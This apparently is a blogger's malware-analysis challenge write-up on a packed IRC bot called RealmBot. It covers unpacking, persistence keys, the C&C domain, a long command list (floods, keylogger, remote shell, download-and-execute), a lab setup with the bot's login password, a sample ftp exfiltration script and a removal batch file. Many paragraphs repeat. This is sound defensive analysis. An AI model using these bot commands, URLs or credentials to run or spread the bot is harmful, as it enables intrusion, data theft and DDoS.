The deadline for submission to the malware challenge has passed, so I will post here my solution. Sorry for the rather poor presentation, but I exported it out from Word.
Describe your malware
lab.
- A virtual
machine (VirtualBox[1])
with WindowsXP installed. - OllyDbg[2]
- IDA 4.9
Freeware[3] - PEiD[4]
- HxD[5]
- LordPE[6]
- ImpRec[7]
What
information can you gather about the malware without executing it?
- First I
examined it in a hex editor (HxD), which hinted at the fact that the
executable is packed (there were two kind of hints – the first one visual
– just scrolling through the PE sections – the second one based on the
histogram of the file – the number of times each byte value occurs). As
you can see above, the number of zero bytes is much lower compared to an
non-packed file, and also the distribution of the values is much more
homogeneous.
- Given that
we determined with a high probability that this executable is packed, the
second question was “what packer was used?” To determine this, several
methods were used: - A brief
inspection with the hex editor. This suggested that a modified version of
UPX was used. The hints were: - The
section names. These are usually named UPX0, UPX1 and UPX2 in case of an
UPX packed executable. In the malware there was a similar file patter,
only that UPX was replaced for ABC - UPX also
includes the version used to pack the file in the form of “[major
version].[minor version] UPX!” at the beginning of the first section.
This too was modified with the same method, and the file reads: 3.03
ABC! - Using
PEiD. While using the standard settings it doesn’t detect anything,
setting the “Deep scan” option (which scans for the signatures in the
entire section where the entry point is located, not just at the entry
point) it correctly identified the packer as UPX - Using
IDA, we can see other signs that UPX was used: - The
distribution of the sections: a section containing no data, followed by
a large section which contains the entry point followed by a small
section containing the imports - The
specific imports for a packed executable (LoadLibraryA, GetProcAddres,
VirtualAlloc, VirtualProtect, etc) - The code
at the entry point - Given that
the malware is packed using a non-standard tool, static unpacking would be
fairly complicated
Unpacking the
executable
To gain further intelligence, an unpacked version of the
executable is needed. Because the modifications to UPX are only superficial,
the method described on reconstructer.org[1]
can be used. At this point we can analyze the dumped binary in IDA (pretty
straight forward, since the original executable was compiled using Visual C –
but still time-consuming) or try to search for the source code. See the second
before last question about retrieving the source code.
executable is needed. Because the modifications to UPX are only superficial,
the method described on reconstructer.org[1]
can be used. At this point we can analyze the dumped binary in IDA (pretty
straight forward, since the original executable was compiled using Visual C –
but still time-consuming) or try to search for the source code. See the second
before last question about retrieving the source code.
Is the malware
packed? If so, how did you determine what it was?
See the previous point.
Describe the
malware’s behavior. What files does it drop? What registry keys does it create
and/or modify? What network connections does it create? How does it auto-start,
etc?
This can be determined either by static analysis or by
running the malware and observing its actions with something like System Safety
Monitor[1],
Process Monitor[2] or the
All Seeing Eye[3]. However
this has the drawback that there is no guarantee for the fact that every
possible aspect of the malware will be manifested. Added with the fact that we
have the source of the malware and it is written in plain C (without
obfuscation), a static analysis is recommended (using IDA for example). The
actions performed by the malware are:
running the malware and observing its actions with something like System Safety
Monitor[1],
Process Monitor[2] or the
All Seeing Eye[3]. However
this has the drawback that there is no guarantee for the fact that every
possible aspect of the malware will be manifested. Added with the fact that we
have the source of the malware and it is written in plain C (without
obfuscation), a static analysis is recommended (using IDA for example). The
actions performed by the malware are:
- If it isn’t
started from there, it copies itself to %WINDIR%Winsec32.exe. Then it
sets the read only, hidden and system attributes on the file. - It also
sets the file time to the time of explorer.exe, to avoid standing out from
other files when sorted by creation date - Finally it
starts the copy and terminates - It
registers itself for autostart in the following registry locations using
the name “Microsoft Svchost local services”: - HKLMSoftwareMicrosoftWindowsCurrentVersionRun
- HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices
- HKCUSoftwareMicrosoftOLE
- Now it
enters in a loop waiting for the internet connection to become available.
When it becomes available, it tries to connect to the C&C server and
listen for commands
The malware also uses (used) a secondary server
(http://www.Nivdav.net/Winsec32.exe) to host probably a copy of itself (it is
hard to tell, since the domain registration was deleted). This is used for the
VNC “exploit”. Basically, if it is instructed to scan for VNC servers listening
on the standard port (5900) and finds one without a password set, it tries to
send it a set of commands which would result in downloading and executing the
specified file.
(http://www.Nivdav.net/Winsec32.exe) to host probably a copy of itself (it is
hard to tell, since the domain registration was deleted). This is used for the
VNC “exploit”. Basically, if it is instructed to scan for VNC servers listening
on the standard port (5900) and finds one without a password set, it tries to
send it a set of commands which would result in downloading and executing the
specified file.
What type of command
and control server does the malware use? Describe the server and interface this
malware uses as well as the domains and URLs accessed by the malware.
The malware tries to connect to an IRC server with the DNS
name “testirc1.sh1xy2bg.NET”.
However, according to domaintools[1], this
domain name was never registered, which leads me to speculate that the sample
was tampered with, or that the perpetrator planned to register it later. The
connection is made on the standard IRC port (6667), which makes it very
probable that it will get blocked (for example in corporate environments) and
also it is easily recognizable.
name “testirc1.sh1xy2bg.NET”.
However, according to domaintools[1], this
domain name was never registered, which leads me to speculate that the sample
was tampered with, or that the perpetrator planned to register it later. The
connection is made on the standard IRC port (6667), which makes it very
probable that it will get blocked (for example in corporate environments) and
also it is easily recognizable.
What commands are
present within the malware and what do they do? If possible, take control of
the malware and run some of these commands, documenting how you did it.
The malware has a wide variety of commands. Here is a list
of them, with a short explanation for each:
of them, with a short explanation for each:
- ftp.upload
– uploads a file from the victim’s computer to an ftp server specified by
the controller. The uploading is done using the standard “ftp.exe” present
in Windows, and a script written out to a file named “.dll”. This file will contain a script similar to:
open ftp.example.com
user foo
pass bar
put
bye - util.hcon
or httpcon – connects to a specified host using the HTTP protocol. Most
probably used for layer 7 DDoS - pingflood
or ddos.pingf – starts a pingflood against a given host. Controller can
determine the packet size and delay between the packets. - ddos.udpf
or udpflood – starts an UDP flood against a given host. Controller can
determine the destination port, packet size and delay between the packets. - asc or
advscan – start scanning a given range of IP address for a given port.
After finding an open port, it can send exploit code it - cid /
currentip – returns the current IP for the portscan thread (which IP is it
currently scanning) - clone.make
/ clone.start – connects to an IRC channel with the intent of “cloning”
(repeating) things said by the botherder - clone.j /
clone.join – joins a given channel on the “cloned” connection - clone.p /
clone.part – parts a given channel on the “cloned” connection - clone.ni /
clone.nick – sets the nick on the “cloned” connection - clone.ra /
clone.raw – repeats the “raw” message on the “cloned” connection. This
means that no prefix (such as PRIVMSG) is added - clone.ac or
clone.action / clone.pm or clone.privmsg – the bot can be connected to
other IRC servers (acting as a proxy) an repeat the commands passed to it
on the connected servers - daemon.rd
or redirect – creates a TCP tunnel on the given interface/port towards the
given address/port (similar to rinetd[2]) - dl or
download – downoads a given file using the HTTP protocol. Optionally the
downloaded file can be “encrypted” using the “prefix” set by the “irc.pr”
or “prefix” command and can be checked to have a particular CRC32. After
the file is downloaded, it is executed. Optionally, it can be marked as an
“update”, in which case the original process is killed after the
downloaded file is executed - synflood /
ddos.ack / ddos.random – does a DDoS against a specified IP/Port. - rename /
com.mv – renames a given local file to an other local name - execute /
com.e – executes a local file. By default the windows of the new program
are hidden. - delay /
irc.de – sleeps given number of seconds (possibly to avoid triggering the
flood detection of IRC servers) - irc.m /
mode – changes its mode on the C&C channel - irc.cy /
cycle – leaves the C&C channel, waits the specified number of seconds
then rejoins it - irc.pm /
privmsg – sends a private message on the C&C connection - share –
lists the available samba shares on the computer - user – adds
/ removes / displays info about a local user - pause /
stop / start – pauses / stops / starts services - keylog.on /
cmd.kl.on – starts a keylogger - readfile /
com.rf – reads a local file and echoes it back to the bot-herder - list /
com.fl – lists the contents of a local directory - delete /
local file - prockillid
/ pkid – kills a process with the given ID - killprocess
/ kpc – kills a process with the given executable name - dns /
irc.dn – resolves a given DNS name and returns the IP - open /
cmd.o – does a ShellExecute[3]
(with the operation parameter set to “open”) on the specified local file.
The windows of the application will be visible (as opposed to execute /
com.e) - prefix /
irc.pr – sets the “prefix” (a string used to decrypt downloaded files) - killt /
killthreads – kills threads associated with the bot - d.ftpd.on /
ftpd.on – starts an FTP server on the specified port - web.on /
httpd.on – starts a web server on the specified port. If a directory is
not specified, the system directory will be used as “wwwroot” - util.fdns /
flushdns – flushes the local DNS cache - farp /
flusharp – flushes the local ARP cache - com.gc /
getclip – echoes back the contents of the local clipboard - opencmd /
cmd1 – opens a command line session (“telnet”) - closecmd –
stops the remote shell - testdlls /
com.dll – lists the DLLs which the bot failed to load - driveinfo /
com.drv – displays the free space for available on the specified drive
(different the A – probably to avoid raising suspicion by querying an
empty floppy drive) - uptime /
com.up – displays the time elapsed since the bot has started - proc.on /
com.ps – lists the processes running on the system and the DLLs each has
loaded - rm / remove
– a very interesting command, since it actually removes the file from the
system and deletes the associated registry entries! - syinfo /
sys – displays system info about the infected system - ni /
netinfo – displays network info (IP Address, connection type, and host
name) about the infected system - clg /
clearlog – clears the internal log - threads.l /
threads – lists the threads running associated with the bot - reboot –
reboots the system - secure /
sec – an other interesting command. When issued, the bot tries to “lock
down” the system to (supposedly) prevent exploitation by others. Settings
it changes: - disables
DCOM - restricts
anonymous logins - deletes
administrative shares like IPC$, ADMIN$, … (but interestingly it only
deletes C$ and D$ – if the system has more drives, the administrative
shares for those won’t be deleted) - lockdown.off
/ ld.off – the reverse of secure - chghttp –
changes the http address used in VNC exploitation - die /
irc.di – dies (exists) - mirc.cmd –
an other interesting command – sends a command to the active mIRC instance
if it can find one
Theoretically speaking letting a bot connect through an
unfiltered internet access is not recommended, because it might receive
commands from the C&C which could result in damage being done to other
computers (for example it is instructed to scan and exploit other machines and
it does so). Also (theoretically speaking) taking over a botnet C&C and
issuing commands to them is not recommended (even commands which would result
in the malware being removed), because (legally speaking) you are still
accessing systems which you are not authorized to do. Both of these issues are
only of theoretical interest, since (as mentioned at the previous question),
the domain the bot is trying to connect to isn’t registered. To do a local
test, take the following steps (credit goes to my colleague CPS for coming up
with this solution):
unfiltered internet access is not recommended, because it might receive
commands from the C&C which could result in damage being done to other
computers (for example it is instructed to scan and exploit other machines and
it does so). Also (theoretically speaking) taking over a botnet C&C and
issuing commands to them is not recommended (even commands which would result
in the malware being removed), because (legally speaking) you are still
accessing systems which you are not authorized to do. Both of these issues are
only of theoretical interest, since (as mentioned at the previous question),
the domain the bot is trying to connect to isn’t registered. To do a local
test, take the following steps (credit goes to my colleague CPS for coming up
with this solution):
- Install an
IRC server locally. A free one for windows is JoinMe[4].
Other options are available[5].
Because the bot uses the standard IRC port (6667), no custom settings are
necessary. - Modify your
hosts file (C:WindowsSystem32DriversEtchosts), by adding the
following two lines:
127.0.0.1 testirc1.sh1xy2bg.NET
127.0.0.2 legalize.it
The first line is used to redirect the malware to the local server when it
tries to connect. The second one is needed because when logging in, the
malware checks that the user is coming from an IP range which resolves
back to “legalize.it”. The
different address is needed to make sure that the TCP stack is resolves
the reverse lookup correctly. - Install an
IRC client (a free one for example is Hirc[6])
and connect to localhost and join the channel “#chalenge” (yes, the typo
is intentional). From the bot it seems that this channel should have had
the password “happy12”, but it is no problem that our simulation doesn’t
have it, because the bot only supplies the password if asked. - Start the
bot. Make sure that internet access is available until the bot connects to
the channel (this is needed because it waits in a loop if no internet
connection is available). Once connected, the connection should be removed
for security reasons. - The bot
uses a username like:[ ] (for example:
To log in, send it the following private message (l is short for login):
.l gemp123
It should respond with the message (which means that the login was
successful, and also that the author of the bot had less than full control
of the intricacies of the English language):
[REALMBOT] : Thank for trying. - To send
other commands, just prefix the command with “.” - To
successfully convince a bot that we are its master, we need to be the
first who issues the login command, or we need to issue the login
How would you
classify this malware? Why?
It is a “classic” general purpose IRC bot/backdoor. It
connects back to a central IRC server and waits there for command from its
“master”, offering non-authorized (“backdoor”) access to the infected machine.
connects back to a central IRC server and waits there for command from its
“master”, offering non-authorized (“backdoor”) access to the infected machine.
What do you think the
purpose of this malware is?
It is a general purpose “bot”, meant to offer backdoor
access to the person controlling it to a large number of infected machines. It
contains no specific functionality (like stealing passwords for WoW[1]),
rather it offers a series of generic methods (like spawning a reverse command
shell) which can be used to implement any malicious behavior.
access to the person controlling it to a large number of infected machines. It
contains no specific functionality (like stealing passwords for WoW[1]),
rather it offers a series of generic methods (like spawning a reverse command
shell) which can be used to implement any malicious behavior.
It also has a lot of functionality related to IRC (proxying
traffic, flooding channels, etc). This is indicative of its origins (bots were
used to have mini-wars on IRC – flooding channels, etc).
traffic, flooding channels, etc). This is indicative of its origins (bots were
used to have mini-wars on IRC – flooding channels, etc).
Is it possible to
find the malware’s source code? If so, how did you do it?
Looking through the strings which can be found in the
unpacked executable, it seems that this malware was named “RealmBot”. Searching
for the string “realmbot source code” with Google results finds the following
discussion on the site “blackhat-forums.com”:
http://www.blackhat-forums.com/index.php?showtopic=6032. Here we have two links
to rapidshare. After downloading and unpacking the archive, we find a directory
named “Crx-realmbot.VNC+RFI” (amongst others). To validate that this is indeed
the source we are looking for, I’ve used the following perl script:
unpacked executable, it seems that this malware was named “RealmBot”. Searching
for the string “realmbot source code” with Google results finds the following
discussion on the site “blackhat-forums.com”:
http://www.blackhat-forums.com/index.php?showtopic=6032. Here we have two links
to rapidshare. After downloading and unpacking the archive, we find a directory
named “Crx-realmbot.VNC+RFI” (amongst others). To validate that this is indeed
the source we are looking for, I’ve used the following perl script:
use strict;
use warnings;
use File::Find;
print “Loading
files…n”;
files…n”;
our $complete_file =
”;
”;
find(sub {
return unless -f $_;
return unless /.(?:h|c|cpp)$/i;
print “$_n”;
open my $f, ‘<‘, $_;
$complete_file .= “n” . join(”,
<$f>);
<$f>);
close $f;
}, ‘Crx-realmbot VNC
exploit and RFI -(rfi not tested)’);
exploit and RFI -(rfi not tested)’);
while (my $line =
<>) {
<>) {
chomp $line;
if ($complete_file =~ /bQ$lineEb/) {
print “x $linen”;
}
else {
print ” $linen”;
}
}
Like this: strings
dumped_.ex$|perl check.pl > out
dumped_.ex$|perl check.pl > out
What this does is to load all the source files, and then
check for the existence of the strings which it gets from the input in the
source file. The strings presented on the input are strings extracted from the
dumped (unpacked) executable. This test, although it didn’t give a 100% match
rate for various reasons (strings need to be escaped in C source code – “” is
written as “\” – some strings are created at runtime, etc), the match rate was
high enough for me to affirm that this is indeed the source code for the
malware.
check for the existence of the strings which it gets from the input in the
source file. The strings presented on the input are strings extracted from the
dumped (unpacked) executable. This test, although it didn’t give a 100% match
rate for various reasons (strings need to be escaped in C source code – “” is
written as “\” – some strings are created at runtime, etc), the match rate was
high enough for me to affirm that this is indeed the source code for the
malware.
What information can
be gleaned from the source code?
- It seems
that an effort was made to make the malware configurable. Besides the
normal settings (IRC server address / port / channel / etc), users can
configure the functionality which to exclude with defines (like NO_CRYPT,
NO_VNC, etc) - The
original bot included the code to exploit a RFI (remote file inclusion)
vulnerability against a forum software written in PHP[2]
(Quicksilver Forum), however this wasn’t included in this compilation of
the malware - The source
code included the option to run the “secure system” command in a loop (but
this isn’t included in this version) - The
original author (if you can call it that – given that the source is a
copy-paste job) seems to be related to the site http://w32-gen.us. Some
chatlogs[3]
seem give further leads, however, without further investigation, it is
unclear what the relation between the different actors are
How would you write a
custom detection and removal tool to determine if the malware is present on the
system and remove it?
On the most basic level, the following batch file can remove
it:
it:
taskkill /IM
Winsec32.exe /F
Winsec32.exe /F
reg DELETE
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v “Microsoft Svchost
local services”
HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v “Microsoft Svchost
local services”
reg DELETE
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices /v “Microsoft
Svchost local services”
HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices /v “Microsoft
Svchost local services”
reg DELETE
HKCUSoftwareMicrosoftOLE /v “Microsoft Svchost local services”
HKCUSoftwareMicrosoftOLE /v “Microsoft Svchost local services”
However, given the large number of commands available to the
bot-herder, it is quite possible that other modifications have been made to the
system, which can not be deduced from looking at the source code. If the system
is critical, a full reinstall is recommended. Also, the possibility must be
taken into consideration that other systems accessible from the given computer
might be compromised (if we are talking about a system behind a firewall with
other computers connected to the local network for example).
bot-herder, it is quite possible that other modifications have been made to the
system, which can not be deduced from looking at the source code. If the system
is critical, a full reinstall is recommended. Also, the possibility must be
taken into consideration that other systems accessible from the given computer
might be compromised (if we are talking about a system behind a firewall with
other computers connected to the local network for example).
[1] World of Warcraft
[2]
http://www.securityfocus.com/bid/19991
http://www.securityfocus.com/bid/19991
[3]
http://gogloom.com/LCIRC/w32-Gen/
http://gogloom.com/LCIRC/w32-Gen/
[1]
http://whois.domaintools.com/sh1xy2bg.net
http://whois.domaintools.com/sh1xy2bg.net
[2]
http://hype-free.blogspot.com/2008/04/port-redirection-under-windows.html
http://hype-free.blogspot.com/2008/04/port-redirection-under-windows.html
[3]
http://msdn.microsoft.com/en-us/library/bb762153(VS.85).aspx
http://msdn.microsoft.com/en-us/library/bb762153(VS.85).aspx
[4]
http://www.softpedia.com/get/Internet/Servers/Other-Servers/JoinMe.shtml
http://www.softpedia.com/get/Internet/Servers/Other-Servers/JoinMe.shtml
[5]
http://www.computerquestionhelp.com/blogs/other/guides/setup-your-own-irc-server.html
http://www.computerquestionhelp.com/blogs/other/guides/setup-your-own-irc-server.html
[6] http://www.xs4all.nl/~hneel/software.htm
[1] http://www.syssafety.com/
[2]
http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
[3]
http://www.fortego.com/en/ase.html
http://www.fortego.com/en/ase.html
[1]
http://www.reconstructer.org/papers.html – 13.12.2006 – Manual unpacking and
Auto-IAT fixing UPX and Aspack
http://www.reconstructer.org/papers.html – 13.12.2006 – Manual unpacking and
Auto-IAT fixing UPX and Aspack
[1] http://www.virtualbox.org/
[2] http://www.ollydbg.de/
[3]
http://www.hex-rays.com/idapro/idadownfreeware.htm
http://www.hex-rays.com/idapro/idadownfreeware.htm
[4] http://peid.has.it/
[5] http://mh-nexus.de/en/hxd/
[6]
http://www.woodmann.net/collaborative/tools/index.php/LordPE
http://www.woodmann.net/collaborative/tools/index.php/LordPE
[7]
http://www.woodmann.com/collaborative/tools/index.php/ImpREC
http://www.woodmann.com/collaborative/tools/index.php/ImpREC